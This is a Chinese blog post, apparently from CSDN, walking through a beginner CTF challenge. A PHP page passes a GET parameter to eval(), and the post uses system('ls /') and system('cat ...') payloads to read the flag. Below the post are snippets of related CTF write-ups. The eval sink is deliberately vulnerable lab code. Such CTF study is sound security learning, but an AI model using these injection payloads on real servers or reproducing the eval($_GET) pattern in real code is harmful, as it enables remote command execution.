[SWPUCTF 2021 新生赛]easyrce

已于 2023-11-27 18:34:28 修改
阅读量56 收藏
点赞数
文章标签: 网络安全 http linux
于 2023-11-26 20:48:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80059204/article/details/134632674
版权

代开靶机之后看到是php脚本

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>

If判断语句告诉我们,如果存在url变量,则执行eval函数,所以我们需要构造执行外部命令函数(关于执行外部命令函数可以参考https://www.cnblogs.com/gaohj/p/3267692.html

构造结果:?url=system(“ls /”);

含义:将外部执行命令ls /结果赋值url,并在浏览器中显示

其中,?表示拼接;ls /代表列出目录文件

注意,该代码输入必须是英文键盘

发送之后可以看到文件目录,猜测flag在flllllaaaaaaggggggg文件中

使用cat命令进行查看  ?url=system("cat /flllllaaaaaaggggggg");

最后得到flag

Lnre
关注
NSSCTF | [SWPUCTF 2021 新生]easyrce
2302_80946742的博客
05-11 288
然后cat命令查看flllllaaaaaaggggggg文件中的内容就可以得到flag。这是一道很简单的RCE(远程命令执行),打开题目后可以看到一个php脚本。可以看到,system函数是可以使用的,使用ls命令正常回显了目录下的文件。直接传入url参数就可以执行相应的命令,先用system函数试试。这题也可以使用蚁剑直接连接就能查看目录,从而得到flag。那么我们看看根目录里面有什么。
NSSCTF刷题笔记web5——[SWPUCTF 2021 新生]easyrce
qq_45692883的博客
01-18 459
没有做过滤,传入的url的值 直接当做php代码执行。代码还是那么的朴实无华,我愿称之为真正的easy。
RCE漏洞及其绕过——[SWPUCTF 2021 新生]easyrce、caidao、babyrce
2401_82985722的博客
04-19 1421
(参考)Shell是一个程序,它在用户和操作系统之间提供了一个面向行的可交互接口。用户在命令行中输入命令,运行在后台的shell把命令转换成指令码发给操作系统。远程代码执行漏洞远程命令执行漏洞。
11.14[SWPUCTF 2021 新生]easyrce已解决题目
plm20030621的博客
11-14 109
第一步, 看到get 传参优先是想到一些get 传参的用法,但在这里,依旧涉及Liunx的一些操作指令,第二步,使用ls 命令去查看当前下有那些文件,做到这里,你已经成功一半了。第三步,cat 查询的命令 得到flag值。用于打印当前有效的用户名称,相当于执行。先用此命令查看自己的用户和权限。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 2万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
SWPUCTF2021新生 部分web笔记
Rick66Ashley的博客
05-31 787
这题也是在毁灭实例的时候满足条件就触发flag,不同的是其有一个_wakeup方法,这种方法就是只要一有反序列化的操作就会触发,这里是反序列化后密码会被sha1 ,也就是说,实例确认默认属性后,反序列化修改属性值,其中密码属性值一定会变成其sha1值,从而无法触发if条件。以O:4:"user":2:{s:4:"name";明显是瞎编的浏览器,不可能有这个,那就抓包,改User-Agent这个头可以说明发这个包的人用了什么操作系统,用了什么浏览器,但是可以修改,也不是完全可信,操作如下。
[SWPUCTF 2021 新生]easyrce(ls 和ls /到底有啥区别?)
2401_84499442的博客
07-09 276
关于使用ls /还是ls ,这里一次性阐述清楚,ls /表示列出根目录下的所有子目录及可能的文件,而ls 是列出当前目录下的所有子目录和文件,同理,使用cat命令也是如此。那就用GET型传参url=system('ls /');注意这里的分号,因为eval是代码执行函数,所以里面必须是完整的php代码。这里发现疑似flag文件,那么执行url=system('ls /flllllaaaaaaggggggg');
nssctf[SWPUCTF 2021 新生]include,[SWPUCTF 2021 新生]easyrce
2301_80871705的博客
10-16 324
传入一个file之后,我们看见了一串php代码。利用php伪协议:?
SWPUCTF 2021 新生-WEB部分wp
m0_74606212的博客
09-23 758
SWPUCTF 2021 新生-WEB部分wp
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 803
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(CRYPTO篇)
jameshuangchuan的博客
08-28 1165
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一篇文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1621
。。
【NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 3191
此处主要在NSSCTF平台()上开展刷题。
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 3085
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8543
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
探索 HTTP 请求方法:GET、POST、PUT、DELETE 等的用法详解
最新发布
weixin_44780781的博客
11-12 523
在 Web 开发中,HTTP 请求方法决定了客户端与服务器之间如何交流数据。无论使用 HTTP 还是 HTTPS 协议,这些请求方法都遵循相同的标准。本文将深入探讨常见的请求方法(GET、POST、PUT、DELETE 等)的用法、适用场景及常见误区。提示:以下是本篇文章正文内容,下面案例可供参考在实际开发中,根据不同的业务需求,合理选择 HTTP 请求方法可以提升接口设计的清晰度、可靠性和安全性。
Go语言 HTTP 服务模糊测试教程
mainjay的博客
11-12 208
模糊测试是一种自动化的软件测试技术,它涉及向计算机程序输入大量有效的、接近有效的或无效的随机数据,并观察其行为和输出。模糊测试的目标是揭示通过传统测试方法可能无法发现的bug、崩溃和安全漏洞。// 可能会因运行时错误而崩溃:索引超出范围if a[i]!= b[i] {这个示例函数在两个切片长度相等时可以完美工作。但当第一个切片比第二个长时,它会发生崩溃(索引超出范围错误此外,当第二个切片是第一个切片的子集时,它也不会返回正确的结果。模糊测试技术通过用各种输入轰炸这个函数,可以轻松发现这个bug。
HTTP 客户端怎么向 Spring Cloud Sleuth 传输跟踪 ID
galoiszhou的博客
11-12 219
如果您需要在某些场景下手动指定,可以在发送请求时通过 HTTP 客户端库(如。如果您希望手动传入这些 ID,可以在请求的 HTTP headers 中传入。在 Spring Cloud Sleuth 的请求链路追踪中,,这样下游的服务将会识别并继承这些 ID。会自动生成和传递这些。
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值